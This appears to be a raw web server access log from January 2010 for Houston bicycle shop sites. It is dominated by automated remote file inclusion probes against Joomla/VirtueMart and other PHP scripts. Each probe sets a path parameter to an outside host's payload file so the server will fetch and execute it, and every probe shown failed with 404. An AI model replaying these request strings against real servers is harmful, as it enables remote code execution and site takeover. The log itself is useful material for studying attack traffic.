74.55.15.194 - - [10/Jan/2010:03:49:50 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [10/Jan/2010:03:50:51 -0800] "GET /appserv/main.php?appserv_root=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
79.170.45.126 - - [10/Jan/2010:03:50:51 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
79.170.45.126 - - [10/Jan/2010:03:50:54 -0800] "GET /logs/access.log/appserv/main.php?appserv_root=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
67.195.111.183 - - [10/Jan/2010:03:53:38 -0800] "GET /bullitinboard/viewtopic.php?p=15546 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
77.221.130.17 - - [10/Jan/2010:03:53:43 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:03:53:43 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:03:53:43 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:03:53:45 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:03:53:45 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:03:53:45 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.230.225.218 - - [10/Jan/2010:03:54:05 -0800] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.97.230.5 - - [10/Jan/2010:03:57:41 -0800] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.55.15.194 - - [10/Jan/2010:03:58:05 -0800] "GET /logs/access.log//index.php?option=com_virtuemart&page=shop.pdf_output&showpage=shop.browse&pop=1&output=pdf&product_id=0&category_id=6&Itemid=3&vmcchk=1//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.55.15.194 - - [10/Jan/2010:03:58:53 -0800] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.16.1.22 - - [10/Jan/2010:03:59:18 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.16.1.22 - - [10/Jan/2010:03:59:18 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.16.1.22 - - [10/Jan/2010:03:59:18 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.55.15.194 - - [10/Jan/2010:04:03:28 -0800] "GET /logs/access.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.urmary.ru//script/ID/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.55.15.194 - - [10/Jan/2010:04:03:28 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.urmary.ru//script/ID/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.55.15.194 - - [10/Jan/2010:04:03:28 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.urmary.ru//script/ID/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [10/Jan/2010:04:03:50 -0800] "GET /logs/access.log//bbs//skin/zero_vote/ask_password.php?dir=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:04:05:05 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:04:05:05 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:04:05:05 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.55.15.194 - - [10/Jan/2010:04:05:28 -0800] "GET /index.php?option=com_virtuemart&page=shop.pdf_output&showpage=shop.browse&pop=1&output=pdf&product_id=0&category_id=6&Itemid=3&vmcchk=1//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.urmary.ru//script/ID/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.55.15.194 - - [10/Jan/2010:04:05:28 -0800] "GET /logs/access.log%20%20//index.php?option=com_virtuemart&page=shop.pdf_output&showpage=shop.browse&pop=1&output=pdf&product_id=0&category_id=6&Itemid=3&vmcchk=1//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.urmary.ru//script/ID/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.55.15.194 - - [10/Jan/2010:04:05:28 -0800] "GET /logs//index.php?option=com_virtuemart&page=shop.pdf_output&showpage=shop.browse&pop=1&output=pdf&product_id=0&category_id=6&Itemid=3&vmcchk=1//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.urmary.ru//script/ID/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:04:06:19 -0800] "GET /logs//login.php?dir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:04:06:20 -0800] "GET /login.php?dir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:04:06:21 -0800] "GET /logs/access.log%20%20//login.php?dir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:04:06:39 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:04:06:39 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:04:06:39 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:04:06:45 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:04:06:45 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:04:06:45 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:04:08:08 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:04:08:08 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:04:08:08 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.55.15.194 - - [10/Jan/2010:04:11:09 -0800] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.urmary.ru//script/ID/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.55.15.194 - - [10/Jan/2010:04:12:43 -0800] "GET /logs/access.log//index.php?option=com_virtuemart&page=shop.pdf_output&showpage=shop.browse&pop=1&output=pdf&product_id=0&category_id=6&Itemid=3&vmcchk=1//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.urmary.ru//script/ID/id?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.115.6.17 - - [10/Jan/2010:04:12:48 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:04:16:09 -0800] "GET /logs/access.log//login.php?dir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.115.6.10 - - [10/Jan/2010:04:17:05 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.bicyclestoreshouston.com"
81.12.13.152 - - [10/Jan/2010:04:41:44 -0800] "GET /logs/access.log///fair.php//?_SERVER[DOCUMENT_ROOT]=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.12.13.152 - - [10/Jan/2010:04:41:44 -0800] "GET //fair.php//?_SERVER[DOCUMENT_ROOT]=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.12.13.152 - - [10/Jan/2010:04:41:44 -0800] "GET /logs///fair.php//?_SERVER[DOCUMENT_ROOT]=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.181.7.39 - - [10/Jan/2010:04:49:15 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "bicyclestoreshouston.com"
219.94.198.80 - - [10/Jan/2010:04:53:59 -0800] "GET /components/com_virtuemart/cal_popup.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
219.94.198.80 - - [10/Jan/2010:04:53:59 -0800] "GET /logs/access.log//components/com_virtuemart/cal_popup.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
219.94.198.80 - - [10/Jan/2010:04:54:01 -0800] "GET /logs//components/com_virtuemart/cal_popup.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.37.114 - - [10/Jan/2010:04:59:41 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
67.195.37.114 - - [10/Jan/2010:04:59:43 -0800] "GET /bullitinboard/viewtopic.php?p=15375 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
219.94.198.80 - - [10/Jan/2010:05:00:26 -0800] "GET /components/com_virtuemart/cal_popup.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
219.94.198.80 - - [10/Jan/2010:05:00:26 -0800] "GET /logs//components/com_virtuemart/cal_popup.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
219.94.198.80 - - [10/Jan/2010:05:00:26 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/cal_popup.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.44.94.145 - - [10/Jan/2010:05:04:25 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.balipost.com/polling//test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "houstonbikeshop.com"
72.44.94.145 - - [10/Jan/2010:05:04:25 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.balipost.com/polling//test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "houstonbikeshop.com"
121.254.168.4 - - [10/Jan/2010:05:20:31 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
121.254.168.4 - - [10/Jan/2010:05:20:31 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
121.254.168.4 - - [10/Jan/2010:05:20:31 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.183.75.148 - - [10/Jan/2010:05:22:07 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.183.75.148 - - [10/Jan/2010:05:22:07 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.183.75.148 - - [10/Jan/2010:05:22:07 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
190.12.47.130 - - [10/Jan/2010:05:24:34 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
190.12.47.130 - - [10/Jan/2010:05:24:38 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
190.12.47.130 - - [10/Jan/2010:05:24:38 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.68.91.143 - - [10/Jan/2010:05:28:15 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.68.91.143 - - [10/Jan/2010:05:28:15 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.68.91.143 - - [10/Jan/2010:05:28:16 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.68.91.143 - - [10/Jan/2010:05:33:31 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [10/Jan/2010:05:38:22 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [10/Jan/2010:05:38:22 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [10/Jan/2010:05:38:22 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [10/Jan/2010:05:38:54 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [10/Jan/2010:05:38:54 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [10/Jan/2010:05:38:54 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.115.6.17 - - [10/Jan/2010:05:39:30 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "houstonbikeshop.com"
65.23.156.168 - - [10/Jan/2010:05:40:00 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [10/Jan/2010:05:40:00 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [10/Jan/2010:05:40:00 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
71.250.232.26 - - [10/Jan/2010:05:41:19 -0800] "GET /logs/access.log/http://www.singharmony.com/about//?_PHPLIB[libdir]=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
71.250.232.26 - - [10/Jan/2010:05:41:20 -0800] "GET /http://www.singharmony.com/about//?_PHPLIB[libdir]=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
71.250.232.26 - - [10/Jan/2010:05:41:20 -0800] "GET /logs/http://www.singharmony.com/about//?_PHPLIB[libdir]=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.16.1.22 - - [10/Jan/2010:05:41:51 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.16.1.22 - - [10/Jan/2010:05:41:51 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.16.1.22 - - [10/Jan/2010:05:41:51 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [10/Jan/2010:05:46:39 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
71.250.232.26 - - [10/Jan/2010:05:48:29 -0800] "GET /logs/access.log/http://www.singharmony.com/about//?_PHPLIB[libdir]=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
71.250.232.26 - - [10/Jan/2010:05:48:30 -0800] "GET /http://www.singharmony.com/about//?_PHPLIB[libdir]=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
71.250.232.26 - - [10/Jan/2010:05:48:30 -0800] "GET /logs/http://www.singharmony.com/about//?_PHPLIB[libdir]=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
68.199.161.70 - - [10/Jan/2010:05:48:56 -0800] "GET /logs/access.log///index.php?option=com_virtuemart&page=shop.pdf_output&showpage=shop.browse&pop=1&output=pdf&product_id=0&category_id=6&Itemid=3&vmcchk=1//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
68.199.161.70 - - [10/Jan/2010:05:48:56 -0800] "GET //index.php?option=com_virtuemart&page=shop.pdf_output&showpage=shop.browse&pop=1&output=pdf&product_id=0&category_id=6&Itemid=3&vmcchk=1//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
68.199.161.70 - - [10/Jan/2010:05:48:56 -0800] "GET /logs///index.php?option=com_virtuemart&page=shop.pdf_output&showpage=shop.browse&pop=1&output=pdf&product_id=0&category_id=6&Itemid=3&vmcchk=1//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
188.40.100.135 - - [10/Jan/2010:05:49:35 -0800] "GET / HTTP/1.0" 200 1748 "-" "Wget/1.11.4" "www.svbikes.com"
65.23.156.168 - - [10/Jan/2010:05:49:57 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
65.23.156.168 - - [10/Jan/2010:05:49:57 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
65.23.156.168 - - [10/Jan/2010:05:49:57 -0800] "GET /logs/scripts.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
121.254.168.4 - - [10/Jan/2010:05:51:48 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
71.250.232.26 - - [10/Jan/2010:05:52:03 -0800] "GET /http://www.singharmony.com/about//?_PHPLIB[libdir]=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
71.250.232.26 - - [10/Jan/2010:05:52:03 -0800] "GET /logs/http://www.singharmony.com/about//?_PHPLIB[libdir]=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
71.250.232.26 - - [10/Jan/2010:05:52:03 -0800] "GET /logs/access.log%20%20/http://www.singharmony.com/about//?_PHPLIB[libdir]=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
71.250.232.26 - - [10/Jan/2010:05:54:14 -0800] "GET /http://www.singharmony.com/about//?_PHPLIB[libdir]=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
